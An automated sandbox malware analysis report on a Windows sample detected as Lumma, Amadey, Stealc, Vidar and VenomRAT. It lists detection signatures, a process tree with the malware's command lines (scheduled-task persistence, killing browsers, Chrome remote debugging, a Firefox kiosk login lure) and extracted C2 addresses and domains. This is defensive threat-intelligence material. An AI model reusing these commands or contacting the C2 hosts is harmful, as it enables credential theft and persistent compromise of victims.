Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1575244
MD5:	524aff0ae21cf7d4731596e8f3967e32
SHA1:	27a75996dfd0ae578e28613f275b0517c0bbd975
SHA256:	a9ce24b52ece47dfb287b912c5223c5b659df5c2fece87141dfa5820ecda23fd
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected Credential Flusher

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected VenomRAT

Yara detected Vidar stealer

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Creates multiple autostart registry keys

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies windows update settings

PE file contains section with special chars

Performs DNS queries to domains with low reputation

Potentially malicious time measurement code found

Protects its processes via BreakOnTermination flag

Queries memory information (via WMI often done to detect virtual machines)

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Potentially Suspicious Malware Callback Communication

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to resolve many domain names, but no domain seems valid

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Connects to many different domains

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Enables security privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Browser Started with Remote Debugging

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Schtasks From Env Var Folder

Sleep loop found (likely to delay execution)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 6964 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 524AFF0AE21CF7D4731596E8F3967E32)

skotes.exe (PID: 2852 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 524AFF0AE21CF7D4731596E8F3967E32)

skotes.exe (PID: 2640 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 524AFF0AE21CF7D4731596E8F3967E32)

skotes.exe (PID: 6720 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 524AFF0AE21CF7D4731596E8F3967E32)

H9TU4oY.exe (PID: 5444 cmdline: "C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe" MD5: 6C1D0DABE1EC5E928F27B3223F25C26B)

ZiYbk6W.exe (PID: 3992 cmdline: "C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe" MD5: 896C86DB673D2FB674920380E608677B)

cmd.exe (PID: 3896 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "chromes" /tr '"C:\Users\user\AppData\Roaming\chromes.exe"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6040 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "chromes" /tr '"C:\Users\user\AppData\Roaming\chromes.exe"' MD5: 48C2FE20575769DE916F48EF0676A965)

c1ca3b12e5.exe (PID: 1276 cmdline: "C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe" MD5: 6255D0D884765ABD3BB418F367CAA8E9)

232a1df2aa.exe (PID: 3300 cmdline: "C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe" MD5: B5F6786928A8020A227E44E3818EAE5E)

chrome.exe (PID: 4092 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7104 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2480 --field-trial-handle=2244,i,13816105926383090107,12018060806231782477,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

855be7cecf.exe (PID: 2908 cmdline: "C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe" MD5: 33E2A0EC0B8839B1DBECB8FC59CEE37A)

taskkill.exe (PID: 3128 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 3196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 6044 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 3712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 3212 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 4900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 2328 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 6460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 6552 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 3344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

firefox.exe (PID: 636 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

2befb05fec.exe (PID: 7452 cmdline: "C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe" MD5: 3433CA8689FA0A7F4B59713960FBDAAC)

eb9e6e120f.exe (PID: 8056 cmdline: "C:\Users\user\AppData\Local\Temp\1015356001\eb9e6e120f.exe" MD5: 3A425626CBD40345F5B8DDDD6B2B9EFA)

cmd.exe (PID: 1808 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mode.com (PID: 7268 cmdline: mode 65,10 MD5: BEA7464830980BF7C0490307DB4FC875)

7z.exe (PID: 7284 cmdline: 7z.exe e file.zip -p24291711423417250691697322505 -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 7308 cmdline: 7z.exe e extracted/file_7.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 2136 cmdline: 7z.exe e extracted/file_6.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 6984 cmdline: 7z.exe e extracted/file_5.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

ee19225489.exe (PID: 7280 cmdline: "C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe" MD5: 28E568616A7B792CAC1726DEB77D9039)

conhost.exe (PID: 7332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ee19225489.exe (PID: 1060 cmdline: "C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe" MD5: 28E568616A7B792CAC1726DEB77D9039)

c1ca3b12e5.exe (PID: 940 cmdline: "C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe" MD5: 6255D0D884765ABD3BB418F367CAA8E9)

firefox.exe (PID: 5984 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 4584 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 5808 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2240 -prefMapHandle 2216 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {98e24b6f-d5ed-4478-94c0-894f34eff867} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 1d752e70310 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 7576 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4140 -parentBuildID 20230927232528 -prefsHandle 4300 -prefMapHandle 4304 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a40b55a-69a4-45fc-a0b1-a2c905871959} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 1d7650bff10 rdd MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

232a1df2aa.exe (PID: 2356 cmdline: "C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe" MD5: B5F6786928A8020A227E44E3818EAE5E)

855be7cecf.exe (PID: 7756 cmdline: "C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe" MD5: 33E2A0EC0B8839B1DBECB8FC59CEE37A)

taskkill.exe (PID: 7892 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

2befb05fec.exe (PID: 8100 cmdline: "C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe" MD5: 3433CA8689FA0A7F4B59713960FBDAAC)

c1ca3b12e5.exe (PID: 6260 cmdline: "C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe" MD5: 6255D0D884765ABD3BB418F367CAA8E9)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}

Threatname: LummaC

{"C2 url": ["debonairnukk.xyz", "effecterectz.xyz", "tacitglibbr.biz", "awake-weaves.cyou", "immureprech.biz", "deafeninggeh.biz", "diffuculttan.xyz", "sordid-snaked.cyou", "wrathful-jammy.cyou"], "Build id": "PsFKDg--pablo"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
dump.pcap	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x68d1d1:$b2: DcRat By qwqdanchun1
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000022.00000002.3250023944.000000000172B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000006.00000003.2324887817.0000000005260000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000002.1804750908.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000001.00000003.1759596074.00000000046E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000022.00000002.3244325269.0000000000B81000.00000040.00000001.01000000.0000000D.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000009.00000003.2548466156.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
0000000E.00000002.3209276748.00000000018DE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000E.00000002.3193860810.0000000000C4C000.00000040.00000001.01000000.0000000D.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1763794480.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000E.00000003.2710567698.0000000005430000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000001.00000002.1800363048.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000022.00000003.2853865505.0000000005510000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1769780317.00000000006B1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.1729574317.00000000051D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000E.00000002.3193860810.0000000000B81000.00000040.00000001.01000000.0000000D.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: ZiYbk6W.exe PID: 3992	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
Process Memory Space: 232a1df2aa.exe PID: 3300	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 232a1df2aa.exe PID: 3300	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 232a1df2aa.exe PID: 3300	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 232a1df2aa.exe PID: 3300	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 855be7cecf.exe PID: 2908	JoeSecurity_CredentialFlusher	Yara detected Credential Flusher	Joe Security
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.file.exe.6b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
1.2.skotes.exe.ae0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.skotes.exe.ae0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "chromes" /tr '"C:\Users\user\AppData\Roaming\chromes.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "chromes" /tr '"C:\Users\user\AppData\Roaming\chromes.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe, ParentProcessId: 3992, ParentProcessName: ZiYbk6W.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "chromes" /tr '"C:\Users\user\AppData\Roaming\chromes.exe"' & exit, ProcessId: 3896, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 6720, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c1ca3b12e5.exe

Sigma detected: Potentially Suspicious Malware Callback Communication

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 87.120.127.228, DestinationIsIpv6: false, DestinationPort: 7777, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe, Initiated: true, ProcessId: 3992, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49824

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe, ParentProcessId: 3300, ParentProcessName: 232a1df2aa.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 4092, ProcessName: chrome.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 6720, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c1ca3b12e5.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks /create /f /sc onlogon /rl highest /tn "chromes" /tr '"C:\Users\user\AppData\Roaming\chromes.exe"' , CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "chromes" /tr '"C:\Users\user\AppData\Roaming\chromes.exe"' , CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "chromes" /tr '"C:\Users\user\AppData\Roaming\chromes.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3896, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /f /sc onlogon /rl highest /tn "chromes" /tr '"C:\Users\user\AppData\Roaming\chromes.exe"' , ProcessId: 6040, ProcessName: schtasks.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T23:58:17.915573+0100	2028371	3	Unknown Traffic	192.168.2.4	49787	104.21.51.88	443	TCP
2024-12-14T23:58:20.104742+0100	2028371	3	Unknown Traffic	192.168.2.4	49794	104.21.22.222	443	TCP
2024-12-14T23:58:22.464679+0100	2028371	3	Unknown Traffic	192.168.2.4	49800	104.21.64.1	443	TCP
2024-12-14T23:58:26.503381+0100	2028371	3	Unknown Traffic	192.168.2.4	49812	104.102.49.254	443	TCP
2024-12-14T23:58:36.725256+0100	2028371	3	Unknown Traffic	192.168.2.4	49842	104.21.50.161	443	TCP
2024-12-14T23:58:39.037384+0100	2028371	3	Unknown Traffic	192.168.2.4	49848	104.21.22.222	443	TCP
2024-12-14T23:58:40.998120+0100	2028371	3	Unknown Traffic	192.168.2.4	49854	104.21.64.1	443	TCP
2024-12-14T23:58:44.383854+0100	2028371	3	Unknown Traffic	192.168.2.4	49862	104.102.49.254	443	TCP
2024-12-14T23:58:50.069782+0100	2028371	3	Unknown Traffic	192.168.2.4	49880	104.21.50.161	443	TCP
2024-12-14T23:58:52.505951+0100	2028371	3	Unknown Traffic	192.168.2.4	49896	104.21.22.222	443	TCP
2024-12-14T23:58:54.488858+0100	2028371	3	Unknown Traffic	192.168.2.4	49907	104.21.64.1	443	TCP
2024-12-14T23:58:58.074300+0100	2028371	3	Unknown Traffic	192.168.2.4	49923	104.102.49.254	443	TCP
2024-12-14T23:59:21.989243+0100	2028371	3	Unknown Traffic	192.168.2.4	50002	104.21.79.7	443	TCP
2024-12-14T23:59:25.413552+0100	2028371	3	Unknown Traffic	192.168.2.4	50018	104.21.50.161	443	TCP
2024-12-14T23:59:25.619516+0100	2028371	3	Unknown Traffic	192.168.2.4	50017	104.102.49.254	443	TCP
2024-12-14T23:59:27.357508+0100	2028371	3	Unknown Traffic	192.168.2.4	50026	104.21.22.222	443	TCP
2024-12-14T23:59:29.426005+0100	2028371	3	Unknown Traffic	192.168.2.4	50033	104.21.64.1	443	TCP
2024-12-14T23:59:32.135939+0100	2028371	3	Unknown Traffic	192.168.2.4	50043	104.102.49.254	443	TCP
2024-12-14T23:59:39.357760+0100	2028371	3	Unknown Traffic	192.168.2.4	50065	104.21.51.88	443	TCP
2024-12-14T23:59:41.375177+0100	2028371	3	Unknown Traffic	192.168.2.4	50077	104.21.22.222	443	TCP
2024-12-14T23:59:43.299764+0100	2028371	3	Unknown Traffic	192.168.2.4	50094	104.21.64.1	443	TCP
2024-12-14T23:59:46.754395+0100	2028371	3	Unknown Traffic	192.168.2.4	50113	104.102.49.254	443	TCP
2024-12-15T00:03:56.261972+0100	2028371	3	Unknown Traffic	192.168.2.4	50279	104.21.50.161	443	TCP
2024-12-15T00:03:58.633662+0100	2028371	3	Unknown Traffic	192.168.2.4	50283	172.67.207.38	443	TCP
2024-12-15T00:04:00.768298+0100	2028371	3	Unknown Traffic	192.168.2.4	50284	104.21.64.1	443	TCP
2024-12-15T00:04:03.981074+0100	2028371	3	Unknown Traffic	192.168.2.4	50288	104.102.49.254	443	TCP
2024-12-15T00:04:11.990818+0100	2028371	3	Unknown Traffic	192.168.2.4	50295	104.21.50.161	443	TCP
2024-12-15T00:04:13.975696+0100	2028371	3	Unknown Traffic	192.168.2.4	50297	172.67.207.38	443	TCP
2024-12-15T00:04:16.222029+0100	2028371	3	Unknown Traffic	192.168.2.4	50299	104.21.64.1	443	TCP
2024-12-15T00:04:19.246149+0100	2028371	3	Unknown Traffic	192.168.2.4	50302	104.102.49.254	443	TCP
